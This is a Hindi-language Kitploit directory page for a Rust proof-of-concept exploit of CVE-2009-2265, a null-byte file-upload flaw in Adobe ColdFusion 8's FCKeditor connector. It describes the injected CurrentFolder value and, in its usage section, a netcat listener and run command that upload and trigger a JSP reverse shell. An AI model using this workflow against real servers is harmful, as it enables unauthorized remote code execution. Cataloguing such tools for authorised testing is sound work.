Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2009-2265 — CVE-2009-2265 एक्सप्लॉइट के POC का एक Rust कार्यान्वयन, जो Adobe ColdFusion 8 को लक्षित करता है। | Kitploit
उपकरण/GitHubGitHub/nika0x38/cve-2009-2265
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubnika0x38/cve-2009-2265

CVE-2009-2265

CVE-2009-2265 एक्सप्लॉइट के POC का एक Rust कार्यान्वयन, जो Adobe ColdFusion 8 को लक्षित करता है।

रिपॉजिटरी देखें
211 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2009-2265 - एडोब कोल्डफ्यूजन 8 फ़ाइल अपलोड RCE

RustSecurity

CVE-2009-2265 एक्सप्लॉइट के POC का एक रस्ट कार्यान्वयन, जो एडोब कोल्डफ्यूजन 8 को लक्षित करता है।


भेद्यता अवलोकन

यह भेद्यता एक अप्रमाणित हमलावर को एडोब कोल्डफ्यूजन 8 चलाने वाले सर्वर पर वेब-सुलभ निर्देशिका में मनमानी फ़ाइलें अपलोड करने की अनुमति देती है, जिससे रिमोट कोड निष्पादन (RCE) होता है।

तकनीकी विवरण

  • भेद्यता: नल बाइट इंजेक्शन के माध्यम से निर्देशिका ट्रैवर्सल
  • घटक: FCKeditor upload.cfm कनेक्टर
  • पैरामीटर: CurrentFolder
  • प्रभाव: रिमोट कोड निष्पादन (RCE)
  • प्रभावित सॉफ्टवेयर: एडोब कोल्डफ्यूजन 8.0.1 और पहले

विवरण

यह भेद्यता /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm पर स्थित FCKeditor घटक की फ़ाइल अपलोड कार्यक्षमता में मौजूद है। CurrentFolder HTTP GET पैरामीटर को ठीक से स्वच्छ नहीं किया गया है, जो नल बाइट (%00) इंजेक्शन हमले की अनुमति देता है।

एक अनुरोध बनाकर जहाँ CurrentFolder पैरामीटर को /<filename>.jsp%00 पर सेट किया जाता है, एक हमलावर सर्वर-साइड एक्सटेंशन जाँचों को बायपास कर सकता है। अंतर्निहित प्रणाली (अक्सर जावा) नल बाइट को स्ट्रिंग के अंत के रूप में व्याख्यायित करती है, फ़ाइल नाम को <filename>.jsp मानते हुए। यह हमलावर को एक दुर्भावनापूर्ण JSP फ़ाइल अपलोड करने की अनुमति देता है। सर्वर इस फ़ाइल को सार्वजनिक रूप से सुलभ निर्देशिका (/userfiles/file/) में सहेजता है, जहाँ से इसे केवल इसके URL तक पहुँच कर निष्पादित किया जा सकता है।

यह POC एक JSP रिवर्स शेल पेलोड उत्पन्न करके, नल बाइट भेद्यता का उपयोग करके इसे अपलोड करके, और लक्ष्य प्रणाली पर शेल प्राप्त करने के लिए इसे ट्रिगर करके प्रक्रिया को स्वचालित करता है।

उपयोग

एक्सप्लॉइट को संकलित और चलाने के लिए इन चरणों का पालन करें।

चरण 1: Netcat लिसनर सेट करें

एक्सप्लॉइट चलाने से पहले, आने वाले रिवर्स शेल को पकड़ने के लिए अपनी स्थानीय मशीन पर एक लिसनर शुरू करें।

root@kitploit:~

nc -lnvp <attacker-port>

चरण 2: एक्सप्लॉइट चलाएँ

संकलित बाइनरी को निष्पादित करें, रिवर्स शेल के लिए अपना स्थानीय होस्ट/पोर्ट और रिमोट लक्ष्य का होस्ट/पोर्ट प्रदान करें।

root@kitploit:~

cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>

स्क्रिप्ट द्वारा पेलोड ट्रिगर करने के बाद, आपको अपने Netcat लिसनर पर एक कनेक्शन प्राप्त करना चाहिए।

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है। जिम्मेदारी से और केवल उन प्रणालियों पर उपयोग करें जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट अनुमति है।

टूल डाउनलोड करें